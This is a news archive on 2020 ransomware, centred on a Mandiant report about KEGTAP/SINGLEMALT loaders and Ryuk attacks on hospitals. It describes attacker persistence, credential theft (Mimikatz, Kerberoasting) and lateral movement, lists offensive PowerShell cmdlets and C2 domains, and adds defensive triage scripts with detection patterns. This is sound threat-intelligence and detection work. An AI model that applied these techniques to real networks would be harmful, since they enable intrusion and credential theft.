Category Archives: ransomware

Halloween News Wrap: The Election, Hospital Deaths and Other Scary Cyberattack Stories

Threatpost breaks down the scariest stories of the week ended Oct. 30 haunting the security industry -- including bugs that just won't die.

Breaches down 51%, exposed records set new record with 36 billion so far

The number of records exposed has increased to a staggering 36 billion. There were 2,935 publicly reported breaches in the first three quarters of 2020, with the three months of Q3 adding an additional 8.3 billion records to what was already the “worst year on record,” Risk Based Security reveals. “The quagmire that formed in the breach landscape this Spring has continued through the third quarter of the year,” commented Inga Goddijn, Executive VP at …

The post Breaches down 51%, exposed records set new record with 36 billion so far appeared first on Help Net Security.

US hospitals warned of threat of imminent ransomware attack

US hospitals and healthcare providers have been warned that there is evidence of a credible and imminent threat that they will be targeted by ransomware. In an alert jointly released by the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS), the agencies reveal that they have "credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers." Read more in my article on the Bitdefender Business Insights blog.

Maze Ransomware Gang to Shut Down Operations

Security researchers learned that the Maze digital crime gang is in the process of shutting down its ransomware operations. Bleeping Computer began hearing rumors of the shutdown in early September 2020. In an email conversation, a ransomware attacker told the computer self-help site that the Maze gang had stopped encrypting new victims in September 2020 […]

The post Maze Ransomware Gang to Shut Down Operations appeared first on The State of Security.

FBI, DHS, HHS Warn of Imminent, Credible Ransomware Threat Against U.S. Hospitals

On Monday, Oct. 27, KrebsOnSecurity began following up on a tip from a reliable source that an aggressive Russian cybercriminal gang known for deploying ransomware was preparing to disrupt information technology systems at hundreds of hospitals, clinics and medical care facilities across the United States. Today, officials from the FBI and the U.S. Department of Homeland Security hastily assembled a conference call with healthcare industry executives warning about an “imminent cybercrime threat to U.S. hospitals and healthcare providers.”

The agencies on the conference call, which included the U.S. Department of Health and Human Services (HHS), warned participants about “credible information of an increased and imminent cybercrime threat to US hospitals and healthcare providers.”

The agencies said they were sharing the information “to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.”

The warning came less than 24 hours after this author received a tip from Alex Holden, founder of Milwaukee-based cyber intelligence firm Hold Security. Holden said he saw online communications this week between cybercriminals affiliated with a Russian-speaking ransomware group known as Ryuk in which group members discussed plans to deploy ransomware at more than 400 healthcare facilities in the U.S.

One participant on the government conference call today said the agencies offered few concrete details of how healthcare organizations might better protect themselves against this threat actor or purported malware campaign.

“They didn’t share any IoCs [indicators of compromise], so it’s just been ‘patch your systems and report anything suspicious’,” said a healthcare industry veteran who sat in on the discussion.

However, others on the call said IoCs may be of little help for hospitals that have already been infiltrated by Ryuk. That’s because the malware infrastructure used by the Ryuk gang is often unique to each victim, including everything from the Microsoft Windows executable files that get dropped on the infected hosts to the so-called “command and control” servers used to transmit data between and among compromised systems.

Nevertheless, cybersecurity incident response firm Mandiant today released a list of domains and Internet addresses used by Ryuk in previous attacks throughout 2020 and up to the present day. Mandiant refers to the group by the threat actor classification “UNC1878,” and aired a webcast today detailing some of Ryuk’s latest exploitation tactics.

Charles Carmakal, senior vice president for Mandiant, told Reuters that UNC1878 is one of the most brazen, heartless, and disruptive threat actors he’s observed over the course of his career.

“Multiple hospitals have already been significantly impacted by Ryuk ransomware and their networks have been taken offline,” Carmakal said.

One health industry veteran who participated in the call today and who spoke with KrebsOnSecurity on condition of anonymity said if there truly are hundreds of medical facilities at imminent risk here, that would seem to go beyond the scope of any one hospital group and may implicate some kind of electronic health record provider that integrates with many care facilities.

So far, however, nothing like hundreds of facilities have publicly reported ransomware incidents. But there have been a handful of hospitals dealing with ransomware attacks in the past few days.

Becker’s Hospital Review reported today that a ransomware attack hit Klamath Falls, Ore.-based Sky Lakes Medical Center’s computer systems.

WWNY’s Channel 7 News in New York reported yesterday that a Ryuk ransomware attack on St. Lawrence Health System led to computer infections at Caton-Potsdam, Massena and Gouverneur hospitals.

SWNewsMedia.com on Monday reported on “unidentified network activity” that caused disruption to certain operations at Ridgeview Medical Center in Waconia, Minn. SWNews says Ridgeview’s system includes Chaska’s Two Twelve Medical Center, three hospitals, clinics and other emergency and long-term care sites around the metro area.

This is a developing story. Stay tuned for further updates.

Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

Email Campaign TTPs

Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

  • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
  • This document contains an in-line link to a URL hosting a malware payload.
  • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
  • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

  • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
  • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure; however, the attackers have since shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
  • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
  • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


Figure 1: Email containing internal references to target an organization’s name


Figure 2: Google Docs PDF document containing a target organization’s logo

Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

Post-Compromise TTPs

Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

Establish Foothold

Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

Maintain Presence

Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot.

  • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding itself to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding itself to the Userinit value under the following registry key:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
  • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
  • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
  • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
  • In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

Escalate Privileges

The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques for accessing credentials stored in memory or on disk to access privileged accounts. 

  • The actors used valid credentials obtained using Mimikatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON.
  • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and the SYSTEM and SECURITY registry hives from a Domain Controller.
  • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the Mimikatz Kerberos module, and the Invoke-Kerberoast cmdlet.

Reconnaissance

The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

  • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
    • Get-GPPPassword
    • Invoke-AllChecks
    • Invoke-BloodHound
    • Invoke-EternalBlue
    • Invoke-FileFinder
    • Invoke-HostRecon
    • Invoke-Inveigh
    • Invoke-Kerberoast
    • Invoke-LoginPrompt
    • Invoke-mimikittenz
    • Invoke-ShareFinder
    • Invoke-UserHunter
  • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfig, findstr, and cmd.exe.
  • The actors leveraged publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
  • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
  • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt.
  • The actors used the Nltest command to list domain controllers.

Lateral Movement

Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

  • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
  • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
  • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

Complete Mission

Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

  • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
  • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
  • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
  • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

Hunting Strategies

If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

  • Isolate and perform a forensic review of any impacted systems.
  • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
  • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
  • Reset credentials for any user accounts associated with execution of the malware.
  • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
  • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc.) and move towards multi-factor authentication (MFA) as soon as possible.

An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which triggers a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS jobs on a host, run the command bitsadmin /list.

  • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
  • Notify state may be set to Fail (Status 2).
  • FileList URL value may be set to the local host or a URL that does not exist.
  • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
  • The Retry Delay value will be set.

WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

Value: Path to the backdoor

Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

  • Named scheduled tasks associated with ANCHOR persistence have followed the pattern: <Random directory within %APPDATA%> autoupdate#<random number>.
  • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.
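The host-artifact checks above (KEGTAP Userinit and startup shortcuts, SINGLEMALT BITS jobs, WINEKEY Run keys, ANCHOR scheduled tasks and SysWOW64 binaries, BEACON service installs) collected into one triage script. This is an added example, not tooling from the Mandiant post; it assumes a Windows 10 / Server 2016 or later host, PowerShell 5.1 and an elevated session, and the path filters and name patterns are assumptions modelled on the artifacts described.

```powershell
# Added triage script (not from the Mandiant post). Assumes Windows 10 / Server
# 2016+, PowerShell 5.1 and an elevated session so that all user hives, all-user
# BITS jobs and the System log are readable. Name patterns and path filters are
# assumptions based on the artifacts described above; tune them per environment.
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Family, [string]$Artifact, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Family = $Family; Artifact = $Artifact; Detail = $Detail })
}

# 1. KEGTAP: Winlogon\Userinit should contain only userinit.exe; anything
#    appended after the comma is launched at every interactive logon.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
foreach ($entry in ((Get-ItemProperty $winlogon).Userinit -split ',')) {
    $e = $entry.Trim()
    if ($e -and $e -notmatch '^(C:\\Windows\\system32\\)?userinit\.exe$') {
        Add-Finding 'KEGTAP' 'Winlogon\Userinit' $e
    }
}
# 1b. KEGTAP: Startup-folder shortcuts (e.g. adobe.lnk) that point into user-writable paths.
$shell = New-Object -ComObject WScript.Shell
Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $target = $shell.CreateShortcut($_.FullName).TargetPath
        if ($target -match '\\AppData\\|\\ProgramData\\|\\Temp\\|\\Users\\Public\\') {
            Add-Finding 'KEGTAP' 'Startup LNK' ("{0} -> {1}" -f $_.FullName, $target)
        }
    }

# 2. SINGLEMALT: BITS jobs with a notification command line whose download source
#    is local or unreachable, or which already sit in an error state (the job is meant to fail).
Import-Module BitsTransfer -ErrorAction SilentlyContinue
foreach ($job in (Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue)) {
    $notify = "$($job.NotifyCmdLine)".Trim()
    if (-not $notify) { continue }
    $sources = ($job.FileList | ForEach-Object { $_.RemoteName }) -join ';'
    if (($job.JobState -in 'Error', 'TransientError') -or
        ($sources -match '^(https?://)?(localhost|127\.0\.0\.1)') -or
        ($job.DisplayName -match '^(Adobe Update|System autoupdate)$')) {
        $detail = "{0} state={1} retry={2}s notify=[{3}] src={4}" -f $job.DisplayName, $job.JobState, $job.MinimumRetryDelay, $notify, $sources
        Add-Finding 'SINGLEMALT' 'BITS job' $detail
    }
}

# 3. WINEKEY: Run values in every loaded user hive ('Backup Mgr' was the observed
#    value name); stack name/data pairs fleet-wide to find the outliers.
if (-not (Get-PSDrive HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}
foreach ($key in (Get-Item 'HKU:\*\Software\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue)) {
    foreach ($name in $key.GetValueNames()) {
        $data = "$($key.GetValue($name))"
        if ($name -eq 'Backup Mgr' -or $data -match '\\AppData\\|\\ProgramData\\|\\Temp\\') {
            Add-Finding 'WINEKEY' 'HKCU Run value' ("{0} [{1}] = {2}" -f $key.Name, $name, $data)
        }
    }
}

# 4. ANCHOR: tasks named 'autoupdate#<n>', tasks with empty or GUID-only names,
#    or any task whose action executes from %APPDATA%.
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    $exec = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join ' | '
    if (($task.TaskName -match '^autoupdate#\d+$') -or
        ($task.TaskName -match '^\{?[0-9A-Fa-f-]{36}\}?$') -or
        [string]::IsNullOrWhiteSpace($task.TaskName) -or
        ($exec -match '\\AppData\\')) {
        Add-Finding 'ANCHOR' 'Scheduled task' ("{0}{1} -> {2}" -f $task.TaskPath, $task.TaskName, $exec)
    }
}

# 5. ANCHOR (low fidelity): 8-lowercase-letter .exe names in SysWOW64, plus the
#    newest files there for review, since that directory should be mostly static.
$sysWow = Get-ChildItem 'C:\Windows\SysWOW64' -File -ErrorAction SilentlyContinue
$sysWow | Where-Object { $_.Name -cmatch '^[a-z]{8}\.exe$' } | ForEach-Object {
    Add-Finding 'ANCHOR' 'SysWOW64 name pattern' ("{0} created {1}" -f $_.Name, $_.CreationTime)
}
$sysWow | Sort-Object CreationTime -Descending | Select-Object -First 5 | ForEach-Object {
    Add-Finding 'ANCHOR' 'SysWOW64 newest file (review)' ("{0} created {1}" -f $_.Name, $_.CreationTime)
}

# 6. BEACON: service installs (System log Event ID 7045) whose image path is a
#    script host, an encoded command, or lives in a staging directory such as PerfLogs.
$filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-30) }
foreach ($ev in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
    $svcName = $ev.Properties[0].Value   # ServiceName
    $image   = $ev.Properties[1].Value   # ImagePath
    if ($image -match 'powershell|cmd\.exe|rundll32|regsvr32|\s-e(nc|ncodedcommand)?\s|\\PerfLogs\\|\\Temp\\|\\AppData\\|\\\\[^\\]+\\(ADMIN|C)\$') {
        Add-Finding 'BEACON' 'Service install (7045)' ("{0} {1} -> {2}" -f $ev.TimeCreated, $svcName, $image)
    }
}

$findings | Sort-Object Family, Artifact | Format-Table -AutoSize -Wrap
```

Every hit is a review candidate rather than a verdict; the SysWOW64 "newest file" rows in particular are there for stacking across hosts, not as indicators on their own.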

The following are additional strategies that may aid in identifying associated activity:

  • Organizations can review web proxy logs in order to identify HXXP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
  • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
  • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.
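The proxy-log strategy in the first bullet, as an added example that is not from the Mandiant post: it flags requests to the hosting services named earlier whose HTTP referrer is a Google Docs page. The log layout (time, client, method, URL, status, referrer) and the sample lines are constructed, and the service domain list is an assumption.

```powershell
# Added example (not from the Mandiant post). Scans proxy log lines for downloads
# from the hosting services named in the post whose referrer is a Google Docs page.
# Log layout and sample lines are constructed; the service domains are assumptions.
# Expected whitespace-separated fields: time client method url status referrer
$HostingServices = 'drive.google.com', 'basecamp.com', 'slack.com',
                   'trello.com', 'yougile.com', 'jetbrains.com'

function Find-DocsReferredDownloads {
    param([string[]]$Lines, [string[]]$Services = $HostingServices)
    foreach ($line in $Lines) {
        $f = $line.Trim() -split '\s+'
        if ($f.Count -lt 6 -or $f[2] -ne 'GET') { continue }
        $url = $null; $ref = $null
        if (-not [uri]::TryCreate($f[3], [UriKind]::Absolute, [ref]$url)) { continue }
        # A bare '-' (no referrer) or a relative referrer is not an absolute URI; skip it.
        if (-not [uri]::TryCreate($f[5], [UriKind]::Absolute, [ref]$ref)) { continue }
        if ($ref.Host -ne 'docs.google.com') { continue }
        # Match the destination host against each service domain or one of its subdomains.
        $svc = $Services | Where-Object { $url.Host -eq $_ -or $url.Host.EndsWith('.' + $_) } | Select-Object -First 1
        if ($svc) {
            [pscustomobject]@{ Time = $f[0]; Client = $f[1]; Service = $svc; Url = $url.AbsoluteUri; Referrer = $ref.AbsoluteUri }
        }
    }
}

# Constructed sample: two hits (drive.google.com and app.basecamp.com) among three benign lines.
$sampleLog = @'
2020-10-28T09:14:02Z 10.1.4.23 GET https://docs.google.com/document/d/CONSTRUCTED1/preview 200 -
2020-10-28T09:14:40Z 10.1.4.23 GET https://drive.google.com/uc?export=download&id=CONSTRUCTED 200 https://docs.google.com/document/d/CONSTRUCTED1/preview
2020-10-28T09:15:11Z 10.1.4.23 GET https://www.microsoft.com/ 200 https://www.bing.com/
2020-10-28T09:16:05Z 10.1.7.8 GET https://app.basecamp.com/attachments/Report_0193.exe 200 https://docs.google.com/document/d/CONSTRUCTED2/preview
2020-10-28T09:17:30Z 10.1.7.9 GET https://trello.com/1/cards/x/attachments/Document.exe 200 https://trello.com/b/board
'@

Find-DocsReferredDownloads -Lines ($sampleLog -split "`r?`n") | Format-Table -AutoSize
```

Run against a real export, pipe in the file with Get-Content and adjust the field indices to your proxy's column order.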

Hardening Strategies

The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

  • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAs for automated rotation.
  • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict the ability of privileged accounts such as Domain Administrators and privileged service accounts to initiate RDP connections and network logons. Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
  • Block internet access for servers where possible. Oftentimes there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
  • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on compromised third-party websites that do not have a business categorization.
  • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.

For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

Campaign Indicators

Sample Email Subjects / Patterns


Example Malware Family MD5s


Code Signing Certificate CNs


UNC1878 Indicators

A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

BEACON C2s

First Seen

Domain

12/11/19

updatemanagir[.]us

12/20/19

cmdupdatewin[.]com

12/26/19

scrservallinst[.]info

1/10/20

winsystemupdate[.]com

1/11/20

jomamba[.]best

1/13/20

updatewinlsass[.]com

1/16/20

winsysteminfo[.]com

1/20/20

livecheckpointsrs[.]com

1/21/20

ciscocheckapi[.]com

1/28/20 | timesshifts[.]com
1/29/20 | cylenceprotect[.]com
1/30/20 | sophosdefence[.]com
1/30/20 | taskshedulewin[.]com
1/30/20 | windefenceinfo[.]com
1/30/20 | lsasswininfo[.]com
1/30/20 | update-wind[.]com
1/30/20 | lsassupdate[.]com
1/30/20 | renovatesystem[.]com
1/31/20 | updatewinsoftr[.]com
2/2/20 | cleardefencewin[.]com
2/2/20 | checkwinupdate[.]com
2/2/20 | havesetup[.]net
2/3/20 | update-wins[.]com
2/3/20 | conhostservice[.]com
2/4/20 | microsoftupdateswin[.]com
2/4/20 | iexploreservice[.]com
2/12/20 | avrenew[.]com
2/12/20 | target-support[.]online
2/12/20 | web-analysis[.]live
2/14/20 | freeallsafe[.]com
2/17/20 | windefens[.]com
2/17/20 | defenswin[.]com
2/17/20 | easytus[.]com
2/17/20 | greattus[.]com
2/17/20 | livetus[.]com
2/17/20 | comssite[.]com
2/17/20 | findtus[.]com
2/17/20 | bigtus[.]com
2/17/20 | aaatus[.]com
2/17/20 | besttus[.]com
2/17/20 | firsttus[.]com
2/17/20 | worldtus[.]com
2/26/20 | freeoldsafe[.]com
2/26/20 | serviceupdates[.]net
2/26/20 | topserviceupdater[.]com
2/27/20 | myserviceupdater[.]com
2/29/20 | myservicebooster[.]net
2/29/20 | servicesbooster[.]org
2/29/20 | brainschampions[.]com
2/29/20 | myservicebooster[.]com
2/29/20 | topservicesbooster[.]com
2/29/20 | servicesbooster[.]com
2/29/20 | topservicesecurity[.]org
2/29/20 | topservicesecurity[.]net
2/29/20 | topsecurityservice[.]net
2/29/20 | myyserviceupdater[.]com
2/29/20 | topservicesupdate[.]com
2/29/20 | topservicesecurity[.]com
2/29/20 | servicesecurity[.]org
2/29/20 | myserviceconnect[.]net
3/2/20 | topservicesupdates[.]com
3/2/20 | yoursuperservice[.]com
3/2/20 | topservicehelper[.]com
3/2/20 | serviceuphelper[.]com
3/2/20 | serviceshelpers[.]com
3/2/20 | boostsecuritys[.]com
3/3/20 | hakunamatatata[.]com
3/8/20 | service-updater[.]com
3/9/20 | secondserviceupdater[.]com
3/9/20 | twelvethserviceupdater[.]com
3/9/20 | twentiethservicehelper[.]com
3/9/20 | twelfthservicehelper[.]com
3/9/20 | tenthservicehelper[.]com
3/9/20 | thirdserviceupdater[.]com
3/9/20 | thirdservicehelper[.]com
3/9/20 | tenthserviceupdater[.]com
3/9/20 | thirteenthservicehelper[.]com
3/9/20 | seventeenthservicehelper[.]com
3/9/20 | sixteenthservicehelper[.]com
3/9/20 | sixthservicehelper[.]com
3/9/20 | seventhservicehelper[.]com
3/9/20 | seventhserviceupdater[.]com
3/9/20 | sixthserviceupdater[.]com
3/9/20 | secondservicehelper[.]com
3/9/20 | ninthservicehelper[.]com
3/9/20 | ninethserviceupdater[.]com
3/9/20 | fourteenthservicehelper[.]com
3/9/20 | fourthserviceupdater[.]com
3/9/20 | firstserviceupdater[.]com
3/9/20 | firstservisehelper[.]com
3/9/20 | fifthserviceupdater[.]com
3/9/20 | eleventhserviceupdater[.]com
3/9/20 | fifthservicehelper[.]com
3/9/20 | fourservicehelper[.]com
3/9/20 | eighthservicehelper[.]com
3/9/20 | eighteenthservicehelper[.]com
3/9/20 | eighthserviceupdater[.]com
3/9/20 | fifteenthservicehelper[.]com
3/9/20 | nineteenthservicehelper[.]com
3/9/20 | eleventhservicehelper[.]com
3/14/20 | thirdservice-developer[.]com
3/14/20 | fifthservice-developer[.]com
3/15/20 | firstservice-developer[.]com
3/16/20 | fourthservice-developer[.]com
3/16/20 | ninethservice-developer[.]com
3/16/20 | seventhservice-developer[.]com
3/16/20 | secondservice-developer[.]com
3/16/20 | sixthservice-developer[.]com
3/16/20 | tenthservice-developer[.]com
3/16/20 | eithtservice-developer[.]com
3/17/20 | servicedupdater[.]com
3/17/20 | service-updateer[.]com
3/19/20 | sexyservicee[.]com
3/19/20 | serviceboostnumberone[.]com
3/19/20 | servicedbooster[.]com
3/19/20 | service-hunter[.]com
3/19/20 | servicedhunter[.]com
3/19/20 | servicedpower[.]com
3/19/20 | sexycservice[.]com
3/23/20 | yourserviceupdater[.]com
3/23/20 | top-serviceupdater[.]com
3/23/20 | top-servicebooster[.]com
3/23/20 | serviceshelps[.]com
3/23/20 | servicemonsterr[.]com
3/23/20 | servicehunterr[.]com
3/23/20 | service-helpes[.]com
3/23/20 | servicecheckerr[.]com
3/23/20 | newservicehelper[.]com
3/23/20 | huntersservice[.]com
3/23/20 | helpforyourservice[.]com
3/23/20 | boostyourservice[.]com
3/26/20 | developmasters[.]com
3/26/20 | actionshunter[.]com
5/4/20 | info-develop[.]com
